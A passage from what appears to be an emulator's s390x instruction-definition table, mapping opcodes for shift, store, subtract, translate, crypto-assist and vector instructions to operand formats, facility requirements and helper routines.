ETF3, 0, 0, 0, 0, srstu, 0) /* SET ACCESS */ C(0xb24e, SAR, RRE, Z, 0, r2_o, 0, 0, sar, 0) /* SET ADDRESSING MODE */ D(0x010c, SAM24, E, Z, 0, 0, 0, 0, sam, 0, 0) D(0x010d, SAM31, E, Z, 0, 0, 0, 0, sam, 0, 1) D(0x010e, SAM64, E, Z, 0, 0, 0, 0, sam, 0, 3) /* SET FPC */ F(0xb384, SFPC, RRE, Z, 0, r1_o, 0, 0, sfpc, 0, IF_BFP) /* SET FPC AND SIGNAL */ F(0xb385, SFASR, RRE, IEEEE_SIM, 0, r1_o, 0, 0, sfas, 0, IF_DFP) /* SET BFP ROUNDING MODE */ F(0xb299, SRNM, S, Z, la2, 0, 0, 0, srnm, 0, IF_BFP) F(0xb2b8, SRNMB, S, FPE, la2, 0, 0, 0, srnmb, 0, IF_BFP) /* SET DFP ROUNDING MODE */ F(0xb2b9, SRNMT, S, DFPR, la2, 0, 0, 0, srnmt, 0, IF_DFP) /* SET PROGRAM MASK */ C(0x0400, SPM, RR_a, Z, r1, 0, 0, 0, spm, 0) /* SHIFT LEFT SINGLE */ D(0x8b00, SLA, RS_a, Z, r1, sh, new, r1_32, sla, 0, 31) D(0xebdd, SLAK, RSY_a, DO, r3, sh, new, r1_32, sla, 0, 31) D(0xeb0b, SLAG, RSY_a, Z, r3, sh, r1, 0, sla, 0, 63) /* SHIFT LEFT SINGLE LOGICAL */ C(0x8900, SLL, RS_a, Z, r1_o, sh, new, r1_32, sll, 0) C(0xebdf, SLLK, RSY_a, DO, r3_o, sh, new, r1_32, sll, 0) C(0xeb0d, SLLG, RSY_a, Z, r3_o, sh, r1, 0, sll, 0) /* SHIFT RIGHT SINGLE */ C(0x8a00, SRA, RS_a, Z, r1_32s, sh, new, r1_32, sra, s32) C(0xebdc, SRAK, RSY_a, DO, r3_32s, sh, new, r1_32, sra, s32) C(0xeb0a, SRAG, RSY_a, Z, r3_o, sh, r1, 0, sra, s64) /* SHIFT RIGHT SINGLE LOGICAL */ C(0x8800, SRL, RS_a, Z, r1_32u, sh, new, r1_32, srl, 0) C(0xebde, SRLK, RSY_a, DO, r3_32u, sh, new, r1_32, srl, 0) C(0xeb0c, SRLG, RSY_a, Z, r3_o, sh, r1, 0, srl, 0) /* SHIFT LEFT DOUBLE */ D(0x8f00, SLDA, RS_a, Z, r1_D32, sh, new, r1_D32, sla, 0, 63) /* SHIFT LEFT DOUBLE LOGICAL */ C(0x8d00, SLDL, RS_a, Z, r1_D32, sh, new, r1_D32, sll, 0) /* SHIFT RIGHT DOUBLE */ C(0x8e00, SRDA, RS_a, Z, r1_D32, sh, new, r1_D32, sra, s64) /* SHIFT RIGHT DOUBLE LOGICAL */ C(0x8c00, SRDL, RS_a, Z, r1_D32, sh, new, r1_D32, srl, 0) /* SQUARE ROOT */ F(0xb314, SQEBR, RRE, Z, 0, e2, new, e1, sqeb, 0, IF_BFP) F(0xb315, SQDBR, RRE, Z, 0, f2, new, f1, sqdb, 0, IF_BFP) F(0xb316, SQXBR, RRE, Z, x2h, x2l, new, x1, sqxb, 0, IF_BFP) F(0xed14, SQEB, RXE, Z, 0, m2_32u, new, e1, sqeb, 0, IF_BFP) F(0xed15, SQDB, RXE, Z, 0, m2_64, new, f1, sqdb, 0, IF_BFP) /* STORE */ C(0x5000, ST, RX_a, Z, r1_o, a2, 0, 0, st32, 0) C(0xe350, STY, RXY_a, LD, r1_o, a2, 0, 0, st32, 0) C(0xe324, STG, RXY_a, Z, r1_o, a2, 0, 0, st64, 0)
F(0x6000, STD, RX_a, Z, f1, a2, 0, 0, st64, 0, IF_AFP1) F(0xed67, STDY, RXY_a, LD, f1, a2, 0, 0, st64, 0, IF_AFP1) F(0x7000, STE, RX_a, Z, e1, a2, 0, 0, st32, 0, IF_AFP1) F(0xed66, STEY, RXY_a, LD, e1, a2, 0, 0, st32, 0, IF_AFP1) /* STORE RELATIVE LONG */ C(0xc40f, STRL, RIL_b, GIE, r1_o, ri2, 0, 0, st32, 0) C(0xc40b, STGRL, RIL_b, GIE, r1_o, ri2, 0, 0, st64, 0) /* STORE CHARACTER */ C(0x4200, STC, RX_a, Z, r1_o, a2, 0, 0, st8, 0) C(0xe372, STCY, RXY_a, LD, r1_o, a2, 0, 0, st8, 0) /* STORE CHARACTER HIGH */ C(0xe3c3, STCH, RXY_a, HW, r1_sr32, a2, 0, 0, st8, 0) /* STORE CHARACTERS UNDER MASK */ D(0xbe00, STCM, RS_b, Z, r1_o, a2, 0, 0, stcm, 0, 0) D(0xeb2d, STCMY, RSY_b, LD, r1_o, a2, 0, 0, stcm, 0, 0) D(0xeb2c, STCMH, RSY_b, Z, r1_o, a2, 0, 0, stcm, 0, 32) /* STORE HALFWORD */ C(0x4000, STH, RX_a, Z, r1_o, a2, 0, 0, st16, 0) C(0xe370, STHY, RXY_a, LD, r1_o, a2, 0, 0, st16, 0) /* STORE HALFWORD HIGH */ C(0xe3c7, STHH, RXY_a, HW, r1_sr32, a2, 0, 0, st16, 0) /* STORE HALFWORD RELATIVE LONG */ C(0xc407, STHRL, RIL_b, GIE, r1_o, ri2, 0, 0, st16, 0) /* STORE HIGH */ C(0xe3cb, STFH, RXY_a, HW, r1_sr32, a2, 0, 0, st32, 0) /* STORE ON CONDITION */ D(0xebf3, STOC, RSY_b, LOC, 0, 0, 0, 0, soc, 0, 0) D(0xebe3, STOCG, RSY_b, LOC, 0, 0, 0, 0, soc, 0, 1) /* STORE HIGH ON CONDITION */ D(0xebe1, STOCFH, RSY_b, LOC2, 0, 0, 0, 0, soc, 0, 2) /* STORE REVERSED */ C(0xe33f, STRVH, RXY_a, Z, la2, r1_16u, new, m1_16, rev16, 0) C(0xe33e, STRV, RXY_a, Z, la2, r1_32u, new, m1_32, rev32, 0) C(0xe32f, STRVG, RXY_a, Z, la2, r1_o, new, m1_64, rev64, 0) /* STORE CLOCK */ C(0xb205, STCK, S, Z, la2, 0, new, m1_64, stck, 0) C(0xb27c, STCKF, S, SCF, la2, 0, new, m1_64, stck, 0) /* STORE CLOCK EXTENDED */ C(0xb278, STCKE, S, Z, 0, a2, 0, 0, stcke, 0) /* STORE FACILITY LIST EXTENDED */ C(0xb2b0, STFLE, S, SFLE, 0, a2, 0, 0, stfle, 0) /* STORE FPC */ F(0xb29c, STFPC, S, Z, 0, a2, new, m2_32, efpc, 0, IF_BFP) /* STORE MULTIPLE */ D(0x9000, STM, RS_a, Z, 0, a2, 0, 0, stm, 0, 4) D(0xeb90, STMY, RSY_a, LD, 0, a2, 0, 0, stm, 0, 4) D(0xeb24, STMG, RSY_a, Z, 0, a2, 0, 0, stm, 0, 8) /* STORE MULTIPLE HIGH */ C(0xeb26, STMH, RSY_a, Z, 0, a2, 0, 0, stmh, 0) /* STORE ACCESS MULTIPLE */ C(0x9b00, STAM, RS_a, Z, 0, a2, 0, 0, stam, 0) C(0xeb9b, STAMY, RSY_a, LD, 0, a2, 0, 0, stam, 0) /* STORE PAIR TO QUADWORD */ C(0xe38e, STPQ, RXY_a, Z, 0, a2, r1_P, 0, stpq, 0) /* SUBTRACT */ C(0x1b00, SR, RR_a, Z, r1, r2, new, r1_32, sub, subs32) C(0xb9f9, SRK, RRF_a, DO, r2, r3, new, r1_32, sub, subs32) C(0x5b00, S, RX_a, Z, r1, m2_32s, new, r1_32, sub, subs32) C(0xe35b, SY, RXY_a, LD, r1, m2_32s, new, r1_32, sub, subs32) C(0xb909, SGR, RRE, Z, r1, r2, r1, 0, sub, subs64) C(0xb919, SGFR, RRE, Z, r1, r2_32s, r1, 0, sub, subs64) C(0xb9e9, SGRK, RRF_a, DO, r2, r3, r1, 0, sub, subs64) C(0xe309, SG, RXY_a, Z, r1, m2_64, r1, 0, sub, subs64) C(0xe319, SGF, RXY_a, Z, r1, m2_32s, r1, 0, sub, subs64) F(0xb30b, SEBR, RRE, Z, e1, e2, new, e1, seb, f32, IF_BFP) F(0xb31b, SDBR, RRE, Z, f1, f2, new, f1, sdb, f64, IF_BFP) F(0xb34b, SXBR, RRE, Z, x2h, x2l, x1, x1, sxb, f128, IF_BFP) F(0xed0b, SEB, RXE, Z, e1, m2_32u, new, e1, seb, f32, IF_BFP) F(0xed1b, SDB, RXE, Z, f1, m2_64, new, f1, sdb, f64, IF_BFP) /* SUBTRACT HALFWORD */ C(0x4b00, SH, RX_a, Z, r1, m2_16s, new, r1_32, sub, subs32) C(0xe37b, SHY, RXY_a, LD, r1, m2_16s, new, r1_32, sub, subs32) /* SUBTRACT HIGH */ C(0xb9c9, SHHHR, RRF_a, HW, r2_sr32, r3_sr32, new, r1_32h, sub, subs32) C(0xb9d9, SHHLR, RRF_a, HW, r2_sr32, r3, new, r1_32h, sub, subs32) /* SUBTRACT LOGICAL */ C(0x1f00, SLR, RR_a, Z, r1, r2, new, r1_32, 
sub, subu32) C(0xb9fb, SLRK, RRF_a, DO, r2, r3, new, r1_32, sub, subu32) C(0x5f00, SL, RX_a, Z, r1, m2_32u, new, r1_32, sub, subu32) C(0xe35f, SLY, RXY_a, LD, r1, m2_32u, new, r1_32, sub, subu32) C(0xb90b, SLGR, RRE, Z, r1, r2, r1, 0, sub, subu64) C(0xb91b, SLGFR, RRE, Z, r1, r2_32u, r1, 0, sub, subu64) C(0xb9eb, SLGRK, RRF_a, DO, r2, r3, r1, 0, sub, subu64) C(0xe30b, SLG, RXY_a, Z, r1, m2_64, r1, 0, sub, subu64) C(0xe31b, SLGF, RXY_a, Z, r1, m2_32u, r1, 0, sub, subu64) /* SUBTRACT LOGICAL HIGH */ C(0xb9cb, SLHHHR, RRF_a, HW, r2_sr32, r3_sr32, new, r1_32h, sub, subu32) C(0xb9db, SLHHLR, RRF_a, HW, r2_sr32, r3, new, r1_32h, sub, subu32) /* SUBTRACT LOGICAL IMMEDIATE */ C(0xc205, SLFI, RIL_a, EI, r1, i2_32u, new, r1_32, sub, subu32) C(0xc204, SLGFI, RIL_a, EI, r1, i2_32u, r1, 0, sub, subu64) /* SUBTRACT LOGICAL WITH BORROW */ C(0xb999, SLBR, RRE, Z, r1, r2, new, r1_32, subb, subb32) C(0xb989, SLBGR, RRE, Z, r1, r2, r1, 0, subb, subb64) C(0xe399, SLB, RXY_a, Z, r1, m2_32u, new, r1_32, subb, subb32) C(0xe389, SLBG, RXY_a, Z, r1, m2_64, r1, 0, subb, subb64) /* SUPERVISOR CALL */ C(0x0a00, SVC, I, Z, 0, 0, 0, 0, svc, 0) /* TEST ADDRESSING MODE */ C(0x010b, TAM, E, Z, 0, 0, 0, 0, tam, 0) /* TEST AND SET */ C(0x9300, TS, S, Z, 0, a2, 0, 0, ts, 0) /* TEST DATA CLASS */ F(0xed10, TCEB, RXE, Z, e1, a2, 0, 0, tceb, 0, IF_BFP) F(0xed11, TCDB, RXE, Z, f1, a2, 0, 0, tcdb, 0, IF_BFP) F(0xed12, TCXB, RXE, Z, 0, a2, x1, 0, tcxb, 0, IF_BFP) /* TEST DECIMAL */ C(0xebc0, TP, RSL, E2, la1, 0, 0, 0, tp, 0) /* TEST UNDER MASK */ C(0x9100, TM, SI, Z, m1_8u, i2_8u, 0, 0, 0, tm32) C(0xeb51, TMY, SIY, LD, m1_8u, i2_8u, 0, 0, 0, tm32) D(0xa702, TMHH, RI_a, Z, r1_o, i2_16u_shl, 0, 0, 0, tm64, 48) D(0xa703, TMHL, RI_a, Z, r1_o, i2_16u_shl, 0, 0, 0, tm64, 32) D(0xa700, TMLH, RI_a, Z, r1_o, i2_16u_shl, 0, 0, 0, tm64, 16) D(0xa701, TMLL, RI_a, Z, r1_o, i2_16u_shl, 0, 0, 0, tm64, 0) /* TRANSLATE */ C(0xdc00, TR, SS_a, Z, la1, a2, 0, 0, tr, 0) /* TRANSLATE AND TEST */ C(0xdd00, TRT, SS_a, Z, la1, a2, 0, 0, trt, 0) /* TRANSLATE AND TEST REVERSE */ C(0xd000, TRTR, SS_a, ETF3, la1, a2, 0, 0, trtr, 0) /* TRANSLATE EXTENDED */ C(0xb2a5, TRE, RRE, Z, 0, r2, r1_P, 0, tre, 0) /* TRANSLATE ONE TO ONE */ C(0xb993, TROO, RRF_c, E2, 0, 0, 0, 0, trXX, 0) /* TRANSLATE ONE TO TWO */ C(0xb992, TROT, RRF_c, E2, 0, 0, 0, 0, trXX, 0) /* TRANSLATE TWO TO ONE */ C(0xb991, TRTO, RRF_c, E2, 0, 0, 0, 0, trXX, 0) /* TRANSLATE TWO TO TWO */ C(0xb990, TRTT, RRF_c, E2, 0, 0, 0, 0, trXX, 0) /* UNPACK */ /* Really format SS_b, but we pack both lengths into one argument for the helper call, so we might as well leave one 8-bit field.
*/ C(0xf300, UNPK, SS_a, Z, la1, a2, 0, 0, unpk, 0) /* UNPACK ASCII */ C(0xea00, UNPKA, SS_a, E2, la1, a2, 0, 0, unpka, 0) /* UNPACK UNICODE */ C(0xe200, UNPKU, SS_a, E2, la1, a2, 0, 0, unpku, 0) /* MSA Instructions */ D(0xb91e, KMAC, RRE, MSA, 0, 0, 0, 0, msa, 0, S390_FEAT_TYPE_KMAC) D(0xb928, PCKMO, RRE, MSA3, 0, 0, 0, 0, msa, 0, S390_FEAT_TYPE_PCKMO) D(0xb92a, KMF, RRE, MSA4, 0, 0, 0, 0, msa, 0, S390_FEAT_TYPE_KMF) D(0xb92b, KMO, RRE, MSA4, 0, 0, 0, 0, msa, 0, S390_FEAT_TYPE_KMO) D(0xb92c, PCC, RRE, MSA4, 0, 0, 0, 0, msa, 0, S390_FEAT_TYPE_PCC) D(0xb92d, KMCTR, RRF_b, MSA4, 0, 0, 0, 0, msa, 0, S390_FEAT_TYPE_KMCTR) D(0xb92e, KM, RRE, MSA, 0, 0, 0, 0, msa, 0, S390_FEAT_TYPE_KM) D(0xb92f, KMC, RRE, MSA, 0, 0, 0, 0, msa, 0, S390_FEAT_TYPE_KMC) D(0xb93c, PPNO, RRE, MSA5, 0, 0, 0, 0, msa, 0, S390_FEAT_TYPE_PPNO) D(0xb93e, KIMD, RRE, MSA, 0, 0, 0, 0, msa, 0, S390_FEAT_TYPE_KIMD) D(0xb93f, KLMD, RRE, MSA, 0, 0, 0, 0, msa, 0, S390_FEAT_TYPE_KLMD) /* === Vector Support Instructions === */ /* VECTOR GATHER ELEMENT */ E(0xe713, VGEF, VRV, V, la2, 0, 0, 0, vge, 0, ES_32, IF_VEC) E(0xe712, VGEG, VRV, V, la2, 0, 0, 0, vge, 0, ES_64, IF_VEC) /* VECTOR GENERATE BYTE MASK */ F(0xe744, VGBM, VRI_a, V, 0, 0, 0, 0, vgbm, 0, IF_VEC) /* VECTOR GENERATE MASK */ F(0xe746, VGM, VRI_b, V, 0, 0, 0, 0, vgm, 0, IF_VEC) /* VECTOR LOAD */ F(0xe706, VL, VRX, V, la2, 0, 0, 0, vl, 0, IF_VEC) F(0xe756, VLR, VRR_a, V, 0, 0, 0, 0, vlr, 0, IF_VEC) /* VECTOR LOAD AND REPLICATE */ F(0xe705, VLREP, VRX, V, la2, 0, 0, 0, vlrep, 0, IF_VEC) /* VECTOR LOAD ELEMENT */ E(0xe700, VLEB, VRX, V, la2, 0, 0, 0, vle, 0, ES_8, IF_VEC) E(0xe701, VLEH, VRX, V, la2, 0, 0, 0, vle, 0, ES_16, IF_VEC) E(0xe703, VLEF, VRX, V, la2, 0, 0, 0, vle, 0, ES_32, IF_VEC) E(0xe702, VLEG, VRX, V, la2, 0, 0, 0, vle, 0, ES_64, IF_VEC) /* VECTOR LOAD ELEMENT IMMEDIATE */ E(0xe740, VLEIB, VRI_a, V, 0, 0, 0, 0, vlei, 0, ES_8, IF_VEC) E(0xe741, VLEIH, VRI_a, V, 0, 0, 0, 0, vlei, 0, ES_16, IF_VEC) E(0xe743, VLEIF, VRI_a, V, 0, 0, 0, 0, vlei, 0, ES_32, IF_VEC) E(0xe742, VLEIG, VRI_a, V, 0, 0, 0, 0, vlei, 0, ES_64, IF_VEC) /* VECTOR LOAD GR FROM VR ELEMENT */ F(0xe721, VLGV, VRS_c, V, la2, 0, r1, 0, vlgv, 0, IF_VEC) /* VECTOR LOAD LOGICAL ELEMENT AND ZERO */ F(0xe704, VLLEZ, VRX, V, la2, 0, 0, 0, vllez, 0, IF_VEC) /* VECTOR LOAD MULTIPLE */ F(0xe736, VLM, VRS_a, V, la2, 0, 0, 0, vlm, 0, IF_VEC) /* VECTOR LOAD TO BLOCK BOUNDARY */ F(0xe707, VLBB, VRX, V, la2, 0, 0, 0, vlbb, 0, IF_VEC) /* VECTOR LOAD VR ELEMENT FROM GR */ F(0xe722, VLVG, VRS_b, V, la2, r3, 0, 0, vlvg, 0, IF_VEC) /* VECTOR LOAD VR FROM GRS DISJOINT */ F(0xe762, VLVGP, VRR_f, V, r2, r3, 0, 0, vlvgp, 0, IF_VEC) /* VECTOR LOAD WITH LENGTH */ F(0xe737, VLL, VRS_b, V, la2, r3_32u, 0, 0, vll, 0, IF_VEC) /* VECTOR MERGE HIGH */ F(0xe761, VMRH, VRR_c, V, 0, 0, 0, 0, vmr, 0, IF_VEC) /* VECTOR MERGE LOW */ F(0xe760, VMRL, VRR_c, V, 0, 0, 0, 0, vmr, 0, IF_VEC) /* VECTOR PACK */ F(0xe794, VPK, VRR_c, V, 0, 0, 0, 0, vpk, 0, IF_VEC) /* VECTOR PACK SATURATE */ F(0xe797, VPKS, VRR_b, V, 0, 0, 0, 0, vpk, 0, IF_VEC) /* VECTOR PACK LOGICAL SATURATE */ F(0xe795, VPKLS, VRR_b, V, 0, 0, 0, 0, vpk, 0, IF_VEC) F(0xe78c, VPERM, VRR_e, V, 0, 0, 0, 0, vperm, 0, IF_VEC) /* VECTOR PERMUTE DOUBLEWORD IMMEDIATE */ F(0xe784, VPDI, VRR_c, V, 0, 0, 0, 0, vpdi, 0, IF_VEC) /* VECTOR REPLICATE */ F(0xe74d, VREP, VRI_c, V, 0, 0, 0, 0, vrep, 0, IF_VEC) /* VECTOR REPLICATE IMMEDIATE */ F(0xe745, VREPI, VRI_a, V, 0, 0, 0, 0, vrepi, 0, IF_VEC) /* VECTOR SCATTER ELEMENT */ E(0xe71b, VSCEF, VRV, V, la2, 0, 0, 0, vsce, 0, ES_32, IF_VEC) E(0xe71a, 
VSCEG, VRV, V, la2, 0, 0, 0, vsce, 0, ES_64, IF_VEC) /* VECTOR SELECT */ F(0xe78d, VSEL, VRR_e, V, 0, 0, 0, 0, vsel, 0, IF_VEC) /* VECTOR SIGN EXTEND TO DOUBLEWORD */ F(0xe75f, VSEG, VRR_a, V, 0, 0, 0, 0, vseg, 0, IF_VEC) /* VECTOR STORE */ F(0xe70e, VST, VRX, V, la2, 0, 0, 0, vst, 0, IF_VEC) /* VECTOR STORE ELEMENT */ E(0xe708, VSTEB, VRX, V, la2, 0, 0, 0, vste, 0, ES_8, IF_VEC) E(0xe709, VSTEH, VRX, V, la2, 0, 0, 0, vste, 0, ES_16, IF_VEC) E(0xe70b, VSTEF, VRX, V, la2, 0, 0, 0, vste, 0, ES_32, IF_VEC) E(0xe70a, VSTEG, VRX, V, la2, 0, 0, 0, vste, 0, ES_64, IF_VEC) /* VECTOR STORE MULTIPLE */ F(0xe73e, VSTM, VRS_a, V, la2, 0, 0, 0, vstm, 0, IF_VEC) /* VECTOR STORE WITH LENGTH */ F(0xe73f, VSTL, VRS_b, V, la2, r3_32u, 0, 0, vstl, 0, IF_VEC) /* VECTOR UNPACK HIGH */ F(0xe7d7, VUPH, VRR_a, V, 0, 0, 0, 0, vup, 0, IF_VEC) /* VECTOR UNPACK LOGICAL HIGH */ F(0xe7d5, VUPLH, VRR_a, V, 0, 0, 0, 0, vup, 0, IF_VEC) /* VECTOR UNPACK LOW */ F(0xe7d6, VUPL, VRR_a, V, 0, 0, 0, 0, vup, 0, IF_VEC) /* VECTOR UNPACK LOGICAL LOW */ F(0xe7d4, VUPLL, VRR_a, V, 0, 0, 0, 0, vup, 0, IF_VEC) /* === Vector Integer Instructions === */ /* VECTOR ADD */ F(0xe7f3, VA, VRR_c, V, 0, 0, 0, 0, va, 0, IF_VEC) /* VECTOR ADD COMPUTE CARRY */ F(0xe7f1, VACC, VRR_c, V, 0, 0, 0, 0, vacc, 0, IF_VEC) /* VECTOR ADD WITH CARRY */ F(0xe7bb, VAC, VRR_d, V, 0, 0, 0, 0, vac, 0, IF_VEC) /* VECTOR ADD WITH CARRY COMPUTE CARRY */ F(0xe7b9, VACCC, VRR_d, V, 0, 0, 0, 0, vaccc, 0, IF_VEC) /* VECTOR AND */ F(0xe768, VN, VRR_c, V, 0, 0, 0, 0, vn, 0, IF_VEC) /* VECTOR AND WITH COMPLEMENT */ F(0xe769, VNC, VRR_c, V, 0, 0, 0, 0, vnc, 0, IF_VEC) /* VECTOR AVERAGE */ F(0xe7f2, VAVG, VRR_c, V, 0, 0, 0, 0, vavg, 0, IF_VEC) /* VECTOR AVERAGE LOGICAL */ F(0xe7f0, VAVGL, VRR_c, V, 0, 0, 0, 0, vavgl, 0, IF_VEC) /* VECTOR CHECKSUM */ F(0xe766, VCKSM, VRR_c, V, 0, 0, 0, 0, vcksm, 0, IF_VEC) /* VECTOR ELEMENT COMPARE */ F(0xe7db, VEC, VRR_a, V, 0, 0, 0, 0, vec, cmps64, IF_VEC) /* VECTOR ELEMENT COMPARE LOGICAL */ F(0xe7d9, VECL, VRR_a, V, 0, 0, 0, 0, vec, cmpu64, IF_VEC) /* VECTOR COMPARE EQUAL */ E(0xe7f8, VCEQ, VRR_b, V, 0, 0, 0, 0, vc, 0, TCG_COND_EQ, IF_VEC) /* VECTOR COMPARE HIGH */ E(0xe7fb, VCH, VRR_b, V, 0, 0, 0, 0, vc, 0, TCG_COND_GT, IF_VEC) /* VECTOR COMPARE HIGH LOGICAL */ E(0xe7f9, VCHL, VRR_b, V, 0, 0, 0, 0, vc, 0, TCG_COND_GTU, IF_VEC) /* VECTOR COUNT LEADING ZEROS */ F(0xe753, VCLZ, VRR_a, V, 0, 0, 0, 0, vclz, 0, IF_VEC) /* VECTOR COUNT TRAILING ZEROS */ F(0xe752, VCTZ, VRR_a, V, 0, 0, 0, 0, vctz, 0, IF_VEC) /* VECTOR EXCLUSIVE OR */ F(0xe76d, VX, VRR_c, V, 0, 0, 0, 0, vx, 0, IF_VEC) /* VECTOR GALOIS FIELD MULTIPLY SUM */ F(0xe7b4, VGFM, VRR_c, V, 0, 0, 0, 0, vgfm, 0, IF_VEC) /* VECTOR GALOIS FIELD MULTIPLY SUM AND ACCUMULATE */ F(0xe7bc, VGFMA, VRR_d, V, 0, 0, 0, 0, vgfma, 0, IF_VEC) /* VECTOR LOAD COMPLEMENT */ F(0xe7de, VLC, VRR_a, V, 0, 0, 0, 0, vlc, 0, IF_VEC) /* VECTOR LOAD POSITIVE */ F(0xe7df, VLP, VRR_a, V, 0, 0, 0, 0, vlp, 0, IF_VEC) /* VECTOR MAXIMUM */ F(0xe7ff, VMX, VRR_c, V, 0, 0, 0, 0, vmx, 0, IF_VEC) /* VECTOR MAXIMUM LOGICAL */ F(0xe7fd, VMXL, VRR_c, V, 0, 0, 0, 0, vmx, 0, IF_VEC) /* VECTOR MINIMUM */ F(0xe7fe, VMN, VRR_c, V, 0, 0, 0, 0, vmx, 0, IF_VEC) /* VECTOR MINIMUM LOGICAL */ F(0xe7fc, VMNL, VRR_c, V, 0, 0, 0, 0, vmx, 0, IF_VEC) /* VECTOR MULTIPLY AND ADD LOW */ F(0xe7aa, VMAL, VRR_d, V, 0, 0, 0, 0, vma, 0, IF_VEC) /* VECTOR MULTIPLY AND ADD HIGH */ F(0xe7ab, VMAH, VRR_d, V, 0, 0, 0, 0, vma, 0, IF_VEC) /* VECTOR MULTIPLY AND ADD LOGICAL HIGH */ F(0xe7a9, VMALH, VRR_d, V, 0, 0, 0, 0, vma, 0, IF_VEC) /* VECTOR MULTIPLY AND 
ADD EVEN */ F(0xe7ae, VMAE, VRR_d, V, 0, 0, 0, 0, vma, 0, IF_VEC) /* VECTOR MULTIPLY AND ADD LOGICAL EVEN */ F(0xe7ac, VMALE, VRR_d, V, 0, 0, 0, 0, vma, 0, IF_VEC) /* VECTOR MULTIPLY AND ADD ODD */ F(0xe7af, VMAO, VRR_d, V, 0, 0, 0, 0, vma, 0, IF_VEC) /* VECTOR MULTIPLY AND ADD LOGICAL ODD */ F(0xe7ad, VMALO, VRR_d, V, 0, 0, 0, 0, vma, 0, IF_VEC) /* VECTOR MULTIPLY HIGH */ F(0xe7a3, VMH, VRR_c, V, 0, 0, 0, 0, vm, 0, IF_VEC) /* VECTOR MULTIPLY LOGICAL HIGH */ F(0xe7a1, VMLH, VRR_c, V, 0, 0, 0, 0, vm, 0, IF_VEC) /* VECTOR MULTIPLY LOW */ F(0xe7a2, VML, VRR_c, V, 0, 0, 0, 0, vm, 0, IF_VEC) /* VECTOR MULTIPLY EVEN */ F(0xe7a6, VME, VRR_c, V, 0, 0, 0, 0, vm, 0, IF_VEC) /* VECTOR MULTIPLY LOGICAL EVEN */ F(0xe7a4, VMLE, VRR_c, V, 0, 0, 0, 0, vm, 0, IF_VEC) /* VECTOR MULTIPLY ODD */ F(0xe7a7, VMO, VRR_c, V, 0, 0, 0, 0, vm, 0, IF_VEC) /* VECTOR MULTIPLY LOGICAL ODD */ F(0xe7a5, VMLO, VRR_c, V, 0, 0, 0, 0, vm, 0, IF_VEC) /* VECTOR NAND */ F(0xe76e, VNN, VRR_c, VE, 0, 0, 0, 0, vnn, 0, IF_VEC) /* VECTOR NOR */ F(0xe76b, VNO, VRR_c, V, 0, 0, 0, 0, vno, 0, IF_VEC) /* VECTOR NOT EXCLUSIVE OR */ F(0xe76c, VNX, VRR_c, VE, 0, 0, 0, 0, vnx, 0, IF_VEC) /* VECTOR OR */ F(0xe76a, VO, VRR_c, V, 0, 0, 0, 0, vo, 0, IF_VEC) /* VECTOR OR WITH COMPLEMENT */ F(0xe76f, VOC, VRR_c, VE, 0, 0, 0, 0, voc, 0, IF_VEC) /* VECTOR POPULATION COUNT */ F(0xe750, VPOPCT, VRR_a, V, 0, 0, 0, 0, vpopct, 0, IF_VEC) /* VECTOR ELEMENT ROTATE LEFT LOGICAL */ F(0xe773, VERLLV, VRR_c, V, 0, 0, 0, 0, verllv, 0, IF_VEC) F(0xe733, VERLL, VRS_a, V, la2, 0, 0, 0, verll, 0, IF_VEC) /* VECTOR ELEMENT ROTATE AND INSERT UNDER MASK */ F(0xe772, VERIM, VRI_d, V, 0, 0, 0, 0, verim, 0, IF_VEC) /* VECTOR ELEMENT SHIFT LEFT */ F(0xe770, VESLV, VRR_c, V, 0, 0, 0, 0, vesv, 0, IF_VEC) F(0xe730, VESL, VRS_a, V, la2, 0, 0, 0, ves, 0, IF_VEC) /* VECTOR ELEMENT SHIFT RIGHT ARITHMETIC */ F(0xe77a, VESRAV, VRR_c, V, 0, 0, 0, 0, vesv, 0, IF_VEC) F(0xe73a, VESRA, VRS_a, V, la2, 0, 0, 0, ves, 0, IF_VEC) /* VECTOR ELEMENT SHIFT RIGHT LOGICAL */ F(0xe778, VESRLV, VRR_c, V, 0, 0, 0, 0, vesv, 0, IF_VEC) F(0xe738, VESRL, VRS_a, V, la2, 0, 0, 0, ves, 0, IF_VEC) /* VECTOR SHIFT LEFT */ F(0xe774, VSL, VRR_c, V, 0, 0, 0, 0, vsl, 0, IF_VEC) /* VECTOR SHIFT LEFT BY BYTE */ F(0xe775, VSLB, VRR_c, V, 0, 0, 0, 0, vsl, 0, IF_VEC) /* VECTOR SHIFT LEFT DOUBLE BY BYTE */ F(0xe777, VSLDB, VRI_d, V, 0, 0, 0, 0, vsldb, 0, IF_VEC) /* VECTOR SHIFT RIGHT ARITHMETIC */ F(0xe77e, VSRA, VRR_c, V, 0, 0, 0, 0, vsra, 0, IF_VEC) /* VECTOR SHIFT RIGHT ARITHMETIC BY BYTE */ F(0xe77f, VSRAB, VRR_c, V, 0, 0, 0, 0, vsra, 0, IF_VEC) /* VECTOR SHIFT RIGHT LOGICAL */ F(0xe77c, VSRL, VRR_c, V, 0, 0, 0, 0, vsrl, 0, IF_VEC) /* VECTOR SHIFT RIGHT LOGICAL BY BYTE */ F(0xe77d, VSRLB, VRR_c, V, 0, 0, 0, 0, vsrl, 0, IF_VEC) /* VECTOR SUBTRACT */ F(0xe7f7, VS, VRR_c, V, 0, 0, 0, 0, vs, 0, IF_VEC) /* VECTOR SUBTRACT COMPUTE BORROW INDICATION */ F(0xe7f5, VSCBI, VRR_c, V, 0, 0, 0, 0, vscbi, 0, IF_VEC) /* VECTOR SUBTRACT WITH BORROW INDICATION */ F(0xe7bf, VSBI, VRR_d, V, 0, 0, 0, 0, vsbi, 0, IF_VEC) /* VECTOR SUBTRACT WITH BORROW COMPUTE BORROW INDICATION */ F(0xe7bd, VSBCBI, VRR_d, V, 0, 0, 0, 0, vsbcbi, 0, IF_VEC) /* VECTOR SUM ACROSS DOUBLEWORD */ F(0xe765, VSUMG, VRR_c, V, 0, 0, 0, 0, vsumg, 0, IF_VEC) /* VECTOR SUM ACROSS QUADWORD */ F(0xe767, VSUMQ, VRR_c, V, 0, 0, 0, 0, vsumq, 0, IF_VEC) /* VECTOR SUM ACROSS WORD */ F(0xe764, VSUM, VRR_c, V, 0, 0, 0, 0, vsum, 0, IF_VEC) /* VECTOR TEST UNDER MASK */ F(0xe7d8, VTM, VRR_a, V, 0, 0, 0, 0, vtm, 0, IF_VEC) /* === Vector String Instructions === */ /* VECTOR FIND 
ANY ELEMENT EQUAL */
F(0xe782, VFAE, VRR_b, V, 0, 0, 0, 0, vfae, 0, IF_VEC)
/* VECTOR FIND ELEMENT EQUAL */
